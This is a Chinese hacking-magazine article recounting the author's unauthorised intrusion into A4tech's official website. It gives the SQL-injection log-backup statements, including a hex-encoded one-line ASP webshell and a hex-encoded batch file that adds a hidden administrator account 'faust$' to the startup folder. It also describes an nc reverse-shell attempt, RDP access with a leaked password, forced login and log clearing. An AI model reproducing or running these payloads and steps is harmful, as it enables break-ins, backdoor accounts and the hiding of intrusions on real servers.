[分享] 渗透双飞燕官方网

双飞燕, 官方

本文已发表在《黑客X档案》第10期，转载请表明出处。
一．师出有名
放假在家闲着没事，就常常上浩方玩魔兽消遣。结果不到半个月鼠标就被我搞挂了……没办法就去买了个双飞燕的鼠标。用起来手感还不错，打了几场胜仗，呵呵。趁着这股兴奋劲还没过，我就顺便对双飞燕的官方网做了一下安全检测。
二．充满希望的开始
在google上搜索关键字：双飞燕官方网，很快就出来了一大堆相关网站。找到主页点击进入http://www.a4tech.com/界面做的还不错，随便点开几个页面，找到了可以利用的之后在URL后面加了个单引号，看到了如图一的错误提示
图一

看来是做了防注入处理。不急，先在网站里逛逛再说。
随便逛了下，在网站里我看到了一幅网站地图，如图二。
图二

原来双飞燕在其他国家也有对应语言的分站，我就随便点开了日本分站。这回成功找到了一个注入点，丢进啊D里检测出来的权限是DBOWNER。如图三。
图三

然后用啊D的列目录功能很快就找到了网站的根目录，如图四：
图四

我尝试用啊D直接上传我的一句话小马，结果失败了，提示是找不到该页面；然后我用HDSI, NBSI等工具上传都没有成功。唉，工具还是靠不住啊~~~看来还得自己动手利用log备份了。备份语句为：
;alter database A4tech_JPN set RECOVERY FULL--
;create table cmd (a image)--
;backup log A4tech_JPN to disk =’d:\Web\a4tech\’ with init--
;insert into cmd (a) values
(0x 60256578656375746520726571756573742822232229253E)--
;backup log A4tech_JPN to disk = ‘d:\Web\a4tech\aspps.asp’ --
;drop table cmd --
然后打开http://www.a4tech.com/aspps.asp 在一大堆乱码如瀑布一样流下之后，我看到了熟悉的错误提示，如图五：
图五

用海阳一句话客户端连接上去，成功得到了webshell。然后我习惯性的传了个功能比较强的大马上去，没想到大马上传上去之后一访问就会出错，搞了很久也不知原因所在。还望高手指点。没办法，只好先凑合着用海阳一句话了。
三．令人郁闷的继续
在webshell里逛了一下，发现权限还过得去：能上传，能执行cmd，能浏览其他盘，支持aspx，可写目录貌似只有网站的根目录。既然支持aspx，我立刻传了个aspx的马上去，在aspx的webshell里尝试往c盘上传文件，可还是失败了。我又上传了个nc，想反弹一个user权限的shell回来，没想到怎么弹都弹不回来，郁闷了……
回到我的webshell，想找网站的数据库连接文件看看能不能弄到SA的用户密码，可是找了半天没找着，加上网速又卡得不行，无奈只好先行放弃；进入C:\Program Files\目录下看看有没有什么可利用的第三方软件。可是结果依然在打击着我：不但没有可利用的软件，我看到了服务器上还安装了卡巴斯基。难怪nc弹不回来，估计是被卡巴干掉了。
这时我想到了差异备份提权的方法，因为windows服务器版的操作系统对于DBOWNER权限下在 C:\Documents and Settings\All Users\「开始」菜单\程序\启动\ 这个目录是具有写权限的。首先我试着连接服务器的3389，可以连接。于是我就尝试备份一个添加用户的批处理到启动项。这时候我们用字符转换工具把我们的加用户语句转化为16进制，如图六：
图六

记得在转换后的代码前面加上一个0x，接下来就是我们的差异备份语句了。和备份拿webshell的过程一样，只不过第四和第五步的代码要改为
;insert into cmd (a) values
(0x 646563686F206F66660D0A6E657420757365722066617573742420313233343536202F6164640D0A6E6574206C6F63616C67726F75702061646D696E6973747261746F727320666175737424202F616464)—
;backup log A4tech_JPN to disk = C:\Documents and Settings\All Users\Start Menu\Programs\Startup\faust.bat’ --

然后在webshell里看到启动项中多了faust.bat这个批处理，接下来只要服务器重启，就添加了faust$这个隶属于管理员组的账号了。
经过了漫长的等待……服务器还是没有重启！！！都三周过去了，估计唐僧的耐心也会耗尽了=。=不行，要速战速决！我直接连上3389想碰下运气，试了5次shift和win+u看看有没有前辈留下的后门，可事实是残酷的……看来投机取巧之举还是行不通啊。
四．峰回路转
没办法再次回到我的webshell继续搜索有用信息，看了下“系统用户及用户组信息”，发现这个服务器上的用户还真多！
突然间我发现这里的用户除了默认的用户之外，其余的似乎都对应着一个网站。权限大多也不一样。然后这时我看到了一个很奇怪的用户，如图七：
图七

这个用户没有对应任何网站，而且用户描述也很奇怪。yuhong!@# 这算是什么描述啊？此时我突发奇想，也许这串奇怪的字符就是这个管理员的密码也说不定！我抱着怀疑的态度用这个账号密码登陆了服务器的3389。然而返回的提示却让我兴奋不已：终端超过了最大允许连！如图八：
图八

哈哈！这就意味着用户密码是正确的！人品爆发了运气真好啊！也不知道管理员怎么想的，记不住密码也不至于把密码写在脸上吧！终端超过最大允许连这点小问题难不倒我，利用一个强制登陆3389的小工具就行了，成功登陆了服务器的3389。如图九：
图九

五．尾声
最后就是打扫战场清理日志后走人。至此，本次入侵就顺利结束了，没有什么技术含量，7分靠运气。最后总结一下就是我们平时在入侵的时候，一些看起来很薄弱的漏洞倒不一定是成功的关键，因为后来我回想了一下，虽然启动项里的那个加用户的批处理也可以进行提权，可是缺点是它在运行的时候会弹出一个黑框，容易引起管理员注意，这样一来就功亏一篑了；而用下载者的话又会被卡巴杀掉，同样是徒劳。所以我们需要的是相对而言比较保险的方法，当时我可以把提权的bat换成相同功能的vbs放到启动项里，但是由于时间有限所以我就没有那么做了。另外还有在入侵的时候不要轻易放过任何一个微小的地方，有些时候这些不太引人注意的地方往往就是成功的突破口。